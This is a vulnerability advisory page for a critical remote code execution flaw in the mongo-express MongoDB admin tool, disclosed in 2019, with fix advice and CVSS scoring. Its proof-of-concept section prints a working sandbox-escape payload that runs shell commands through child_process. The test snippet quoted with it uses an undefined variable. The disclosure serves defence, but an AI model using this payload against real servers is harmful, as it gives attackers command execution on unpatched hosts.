Remote Code Execution (RCE) Affecting mongo-express package, versions <0.54.0


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Mature
    EPSS
    97.46% (100th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-MONGOEXPRESS-473215
  • published 16 Oct 2019
  • disclosed 14 Oct 2019
  • credit Jonathan Leitschuh

How to fix?

Upgrade mongo-express to version 0.54.0 or higher.

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {
      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
      `;
      const result = bson.toBSON(calculatorTest);
    });

CVSS Scores

version 3.1
Expand this section

Snyk

10 critical
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Changed
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

9.9 critical